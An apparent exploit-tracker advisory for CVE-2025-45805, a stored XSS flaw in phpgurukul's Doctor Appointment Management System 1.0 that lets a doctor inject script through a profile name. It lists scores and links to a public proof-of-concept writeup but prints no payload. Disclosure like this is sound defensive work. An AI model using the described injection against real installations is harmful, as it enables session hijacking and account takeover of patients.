CVE-2025-45805

HIGH

phpgurukul Doctor Appointment Management System 1.0 - Authenticated Stored Cross-Site Scripting via Doctor Profile Name

Title source: llm

Exploitation Summary

EIP tracks 1 public exploit for CVE-2025-45805. PoCs published by mohammed-alsaqqaf.

AI-analyzed exploit summary This repository contains a writeup for CVE-2025-45805, a stored XSS vulnerability in the Doctor Appointment Management System by phpgurukul. The vulnerability allows authenticated doctor users to inject arbitrary JavaScript code into profile fields, leading to potential account takeover or session hijacking when patients view the booking page.

Description

In phpgurukul Doctor Appointment Management System 1.0, an authenticated doctor user can inject arbitrary JavaScript code into their profile name. This payload is subsequently rendered without proper sanitization, when a user visits the website and selects the doctor to book an appointment.

Exploits (1)

nomisec WRITEUP

by mohammed-alsaqqaf · poc

https://github.com/mohammed-alsaqqaf/CVE-2025-45805

View Code ZIP pw:eip

This repository contains a writeup for CVE-2025-45805, a stored XSS vulnerability in the Doctor Appointment Management System by phpgurukul. The vulnerability allows authenticated doctor users to inject arbitrary JavaScript code into profile fields, leading to potential account takeover or session hijacking when patients view the booking page.

Classification

Writeup 90%

Attack Type

Xss

Complexity

Trivial

Reliability

Reliable

Target: Doctor Appointment Management System v1.0 by phpgurukul

Auth required

Prerequisites: Authenticated access as a doctor user · Victim must visit the booking page

MITRE ATT&CK

T1189 - Drive-by Compromise T1059.007 - JavaScript

devstral-2 · analyzed Feb 16, 2026 Full analysis →

References (3)

Core 3

Core References

Various Sources

https://github.com/mohammed-alsaqqaf/CVE-2025-45805

Third Party Advisory

https://github.com/mhsinj/CVE-2025-45805

Product

https://phpgurukul.com/doctor-appointment-management-system-using-php-and-mysql

Scores

CVSS v3 7.6

EPSS 0.0036

EPSS Percentile 27.9%

Attack Vector NETWORK

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L

CISA SSVC

Vulnrichment

Exploitation poc

Automatable no

Technical Impact partial

Details

CWE

CWE-79

Status published

Products (1)

phpgurukul/doctor_appointment_management_system 1.0.0

Published Sep 03, 2025

Tracked Since Feb 18, 2026